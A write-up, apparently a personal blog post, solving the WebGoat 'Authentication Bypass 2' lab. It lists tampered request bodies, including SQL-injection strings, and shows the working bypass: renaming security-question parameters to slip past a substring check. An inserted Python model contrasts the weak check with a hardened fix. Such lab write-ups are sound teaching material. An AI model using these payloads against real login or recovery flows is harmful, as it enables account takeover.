
After reading both the previous lesson and the example in this one, let's go ahead and fill in and submit the form.

From the Burp HTTP history the request looks clean enough, so let's try modifying it. I personally tried all of the following variations of the request body:

secQuestion0=teacher&secQuestion1=street&jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746
jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746
jsEnabled=0&verifyMethod=SEC_QUESTIONS&userId=12309746
jsEnabled=1&verifyMethod=NONE&userId=12309746
jsEnabled=1&verifyMethod=&userId=12309746
jsEnabled=0&verifyMethod=NONE&userId=12309746
secQuestion0=&secQuestion1=&jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746
secQuestion0=&secQuestion1=&jsEnabled=1&verifyMethod=NONE&userId=12309746
secQuestion0=&secQuestion1=&jsEnabled=0&verifyMethod=SEC_QUESTIONS&userId=12309746
secQuestion0=&secQuestion1=&jsEnabled=1&verifyMethod=&userId=12309746
secQuestion0=&secQuestion1=&jsEnabled=0&verifyMethod=&userId=12309746
secQuestion0=teacher&secQuestion1=street&jsEnabled=1&verifyMethod=NONE&userId=12309746
secQuestion0=teacher&secQuestion1=street&jsEnabled=0&verifyMethod=SEC_QUESTIONS&userId=12309746
secQuestion0=teacher' or '1'='1&secQuestion1=street' or '1'='1&jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746
secQuestion0=teacher' or '1'='1';--&secQuestion1=street' or '1'='1';--&jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746
I tried these and many more tests, but I was not getting anything from WebGoat.

Since I was stuck I went to the WebGoat repository on GitHub, which, I admit, can be considered cheating — https://github.com/WebGoat/WebGoat

I went looking for the lesson source and found it in VerifyAccount.java.

In VerifyAccount.java, inside the completed() function, the HTTP parameters are put into a HashMap by the parseSecQuestions() function.

This function reads all parameters from the HTTP request and returns, as a HashMap, every parameter whose name contains the string “secQuestion”.

After the parameters are returned as a HashMap, a didUserLikelyCheat() function checks that I am not using the static property values from AccountVerificationHelper.java to complete the lesson.

And finally there is a verifyAccount() function which checks whether the number of parameters is correct and, once again, whether I am using the static property values from the source code.

So to pass the completed() function successfully I have to:
- Get the parameters from the request into the HashMap by means of the parseSecQuestions() function
- Get a “true” from the verifyAccount() function by
— passing the right number of parameters
— not passing a secQuestion0 parameter, or its value will be checked
— not passing a secQuestion1 parameter, or its value will be checked

But from parseSecQuestions() I see that, to be passed on to verifyAccount(), a parameter name only has to contain the string “secQuestion”, so why not try “secQuestionA” and “secQuestionB”?

By passing the same values in parameters named “secQuestionA” and “secQuestionB”, the lesson is completed.

In fact, anything with the proper pattern is a solution for this lesson, as long as the number of parameters matches that of an untampered request:

secQuestion2=teacher&secQuestion3=street&jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746
secQuestion=teacher&secQuestionB=street&jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746
AAAsecQuestion=teacher&BBBsecQuestion=street&jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746
AAAsecQuestionA=teacher&BBBsecQuestionB=street&jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746
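To make the root cause concrete, here is an added Python model of the two checks described above and of the fix a maintainer would apply. It is not WebGoat's code: the weak functions reproduce only the shape the write-up describes (substring match on the parameter name, count check, and value comparison skipped when secQuestion0/secQuestion1 are absent), didUserLikelyCheat() is left out, and the stored answers "alpha"/"bravo" are constructed placeholders, not the values in AccountVerificationHelper.java. The hardened version selects parameters by exact name, requires every expected answer, and compares in constant time, so renaming the fields no longer helps.

```python
import hmac
from urllib.parse import parse_qs

EXPECTED_NAMES = frozenset({"secQuestion0", "secQuestion1"})

# Constructed placeholder for the user's stored answers (not WebGoat's values).
STORED_ANSWERS = {"secQuestion0": "alpha", "secQuestion1": "bravo"}


def parse_request_body(body):
    """Flatten an application/x-www-form-urlencoded body into {name: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def parse_sec_questions_weak(params):
    """Shape of parseSecQuestions() as the write-up describes it: keep every
    parameter whose *name contains* 'secQuestion'. The client chooses names,
    so the client decides what reaches the verifier."""
    return {k: v for k, v in params.items() if "secQuestion" in k}


def verify_account_weak(questions, stored=STORED_ANSWERS):
    """Shape of verifyAccount() as described: the count must match, and
    secQuestion0/secQuestion1 are compared only *if present*."""
    if len(questions) != len(stored):
        return False
    for name in ("secQuestion0", "secQuestion1"):
        if name in questions and questions[name] != stored[name]:
            return False
    return True  # nothing was compared when the expected names are absent


def verify_account_hardened(params, stored=STORED_ANSWERS):
    """Fix: pick parameters by exact name, refuse if any expected answer is
    missing, ignore extra parameters, and compare in constant time."""
    submitted = {name: params.get(name) for name in EXPECTED_NAMES}
    if any(value is None for value in submitted.values()):
        return False
    ok = True
    for name in EXPECTED_NAMES:
        ok &= hmac.compare_digest(submitted[name].encode(), stored[name].encode())
    return ok


def weak_path(body):
    """Weak pipeline: substring filter, then count/optional-value check."""
    return verify_account_weak(parse_sec_questions_weak(parse_request_body(body)))


def hardened_path(body):
    """Hardened pipeline: exact-name selection with mandatory comparison."""
    return verify_account_hardened(parse_request_body(body))


if __name__ == "__main__":
    # Constructed request bodies following the page's parameter layout.
    renamed = "secQuestionA=x&secQuestionB=y&jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746"
    legit = "secQuestion0=alpha&secQuestion1=bravo&jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746"
    wrong = "secQuestion0=nope&secQuestion1=bravo&jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746"
    for label, body in (("renamed", renamed), ("legit", legit), ("wrong", wrong)):
        print(f"{label:8} weak={weak_path(body)!s:5} hardened={hardened_path(body)}")
```

The renamed request passes the weak path because the count is two and neither expected key is present to be compared, which is exactly the condition the write-up derives; the hardened path rejects it because a missing expected answer is a failure, not a skipped check.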
And this concludes WebGoat Authentication Bypass 2
I hope you liked it
PVXs — https://twitter.com/pivixih